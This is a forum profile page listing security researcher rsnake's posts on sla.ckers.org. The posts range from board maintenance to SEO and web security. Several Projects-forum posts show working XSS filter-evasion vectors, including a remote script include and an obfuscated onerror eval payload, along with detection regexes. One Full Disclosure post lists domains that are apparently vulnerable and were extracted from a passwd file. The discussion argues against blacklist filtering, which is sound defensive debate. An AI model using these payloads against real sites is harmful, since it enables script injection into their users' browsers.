Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Ways to improve page rank, or deceptively get more users to your websites or away from your competition. Where you can discuss SEO (search engine optimization) issues as it relates to computer security. 

Pages: 12345...LastNext
Current Page: 1 of 91
Results 1 - 30 of 2712
7 months ago
rsnake
To you too, guys! :)
Forum: OMG Ponies
3 years ago
rsnake
FYI - you trouble makers you with all your being security experts and talking about your fancy security stuff. Stop taunting the Germans with false positives - they get cranky: > From: <abuse@clean-mx.de> > To: <support@onr.com> > Cc: <soc@us-cert.gov> > Subject: (207.200.14.141)-->(support@onr.com) > viruses sites (1 so far) within your network, ple
Forum: Obfuscation
3 years ago
rsnake
I think his point was that it can be traced back to the real people.
Forum: OMG Ponies
3 years ago
rsnake
The problem is the hashes will vary 100% if they are good hashing algorithms if even something as simple as "Jan" is replaced by "Feb". You'll probably have to think of something a little more clever - like percent different or something. I believe the search engines know what headers and footers look like so they can disregard that part and just focus on the meat.
Forum: Robots/Spiders/CAPTCHAs, oh my
3 years ago
rsnake
But it's "secur"image! ;)
Forum: Robots/Spiders/CAPTCHAs, oh my
3 years ago
rsnake
That may be a lot of IPs to correlate. But it's a clever idea if there's another place they may have done something similar. The chances of collisions are usually fairly low except for AOL, etc...
Forum: OMG Ponies
3 years ago
rsnake
To you as well, clhac - welcome to the boards!
Forum: Intro
3 years ago
rsnake
I'll have to check this out. Very cool. But what was your original impetus for writing this? PHP shells under a certain size or something? Or does it also help with performance in some way?
Forum: Projects
3 years ago
rsnake
Yeah, I'm not sure why that was there when it wasn't previously, but we removed it. Thanks.
Forum: News and Links
3 years ago
rsnake
Hey guys, the settings should be identical from the last install we had, so theoretically there should be no new bugs, but I know at least one existed (Thanks to Gareth Heyes for pointing it out). I disabled smilies and auto-linking which appears to have fixed that problem and coincidentally makes the board less annoying, so it's a win win. Let me know if you guys see any other issues pop up.
Forum: Bugs
3 years ago
rsnake
Cool idea. May want to add variable width encoding escape here too... although technically it qualifies as an attribute escape, so maybe it gets you no extra points. Same deal with null bytes in HTML tags - not sure if that gives you extra points by those rules.
Forum: Obfuscation
4 years ago
rsnake
That's a lot to respond to so I'll only respond to the part that mentions me to be brief. I don't think I ever made a fuss out of NTO. I think the only thing I've ever even said about them is that they got number one in Larry's report (twice) and that I agree that depth metrics is one solid metric among several that is worth thinking about when evaluating a scanner. In fact I've said nice thing
Forum: Projects
4 years ago
rsnake
The following also are probably vulnerable as a result: $ cat passwd.txt |cut -f 5 -d :|cut -f 1 -d " "|egrep "\." media.livinghistorylibrary.org thesciotovoice.com theultranyc.com chiquitonis.com kingsdestiny.org cooler.futurenotfound.com fishkimissions.net thepaperofwabash.com musicvcds.com mistressshah.com pooparticles.com hplife.org visceralreactions.com mi
Forum: Full Disclosure
4 years ago
rsnake
@rvdh - the URL is down, do you have a current location for your symbols doc?
Forum: Projects
4 years ago
rsnake
I was toying around with vtunnel (vtunnel.com) for a bit last night, and didn't see an easy way to de-cloak. It seems to do a pretty good job of replacing direct links and re-writing things like eval and document.write document.location, et al. I was curious if anyone else had any luck working around it for de-cloaking purposes? Kind of a fun project in a way.
Forum: Projects
4 years ago
rsnake
Uh, the RSnake one is me, the other one, not so much.
Forum: News and Links
4 years ago
rsnake
Code obfuscation is the very next thing they'll do if they know this is how they're being detected. But it'll probably work well for a while.
Forum: Projects
4 years ago
rsnake
This is compiled from over half a million separate HTTP requests. The data is in aggregate but it's still pretty cool just to look at it like this: http://www.secureseo.com/blog/2009/09/08/list-of-http-headers/
Forum: Projects
4 years ago
rsnake
So that would make it 3.4 x 10^38 chances for someone to brute force your credential. I can see why it's maybe annoying to stay logged in, but would you rather we arbitrarily log you out after x hours? That's what the logout button is for. If it really worries you, I'd just click logout when I'm done for the day. That's what I do. No need to keep user sessions active any longer than I have to
Forum: Bugs
6 years ago
rsnake
@.mario - I'm certainly not meaning to say this hasn't been time well spent. What I mean is that the fundamental approach of blacklisting is flawed - as evidenced by 17 pages of bugs. To me that's a fun experiment, and not an actual "solve". Solving the problem is by disabling all HTML for instance. Solving it is content restrictions. Solving is turning off all active content in the
Forum: Projects
6 years ago
rsnake
I don't mean to rain on the parade here - but I have to ask a very serious question. Do you all think this will actually come to a stop at some point and it will be perfect? Do you think after 17 pages of bugs there is a realistic end in sight? Every time I read this thread I just keep thinking, why are we continuing down this path that keeps being proven to fail in one way or another? I'm a
Forum: Projects
7 years ago
rsnake
Without going through each and every one of these: (["|'][\s]*\>) //finds html breaking injections including whitespace attacks Breakable by: " a > (["|'][\s]*\<) //finds attribute breaking injections including whitespace attacks Breakable by: " a < Regex is hard.
Forum: Projects
7 years ago
rsnake
You haven't seen URL's with < or > in them before? Hmmm... you should visit some math sites. ;) Also, some sides DO allow HTML to be entered into them, so you would risk breaking those sites as well if you implemented something like that globally. But it still might be worth it to get rid of the risk. My feeling is it would have to be more intelligent than just looking for a few risky
Forum: Projects
7 years ago
rsnake
If I had a dollar for every time I heard someone say that the browser shouldn't render something I've written I'd be a very wealthy man. :) Honestly, that's a great compliment in a way. Creating something that humans think shouldn't work but computers do is an art form. It is amazing though.
Forum: Projects
7 years ago
rsnake
All the components of it are on the cheat sheet, but not that particular string, no. There are hundreds of varients of each vector, I only list them so people know why they work, not as the bible. But don't filter on .js, that's just ridiculously easy to get around: <script/src=//ha.ckers.org/.j Yes, it's some small amount of protection, but it's certainly not a panacea (nothing is in w
Forum: Projects
7 years ago
rsnake
It does in Firefox, sure.
Forum: Projects
7 years ago
rsnake
Sure, if you want false positives though why bother with any sort of regex other than <|%3C|>|%3E|'|"|(|)|%27|%22|%28|%29|%00|¼|%BC etc...? I mean if you don't want to allow that stuff then you should at least know when it's hitting your server. Maybe not blocking but definitely alerting... If you don't care about false positives, why not log anything suspicious and then write a p
Forum: Projects
7 years ago
rsnake
uh... no... I mean that would fix that single variant, but it wouldn't stop someone from working around it: <script/src=//ha.ckers.org/xss.js
Forum: Projects
7 years ago
rsnake
@mario - That did catch the first thing I tried. Unfortunately the first thing I tried was totally benign. So you'll probably end up with a whole lot of false positives: <IMG SRC="http://ha.ckers.org/images/kcpimp.jpg"> @jungsonn - that filter (RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) ) will fall down for something as simple as the half open vector in Fi
Forum: Projects
7 years ago
rsnake
Ugh... whatever... this gets by it. I was lazy, but trust me, it's easy to circumvent that filter: <IMG SRC="$user_input" ALT="IMG"> " onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))" a="
Forum: Projects
Pages: 12345...LastNext
Current Page: 1 of 91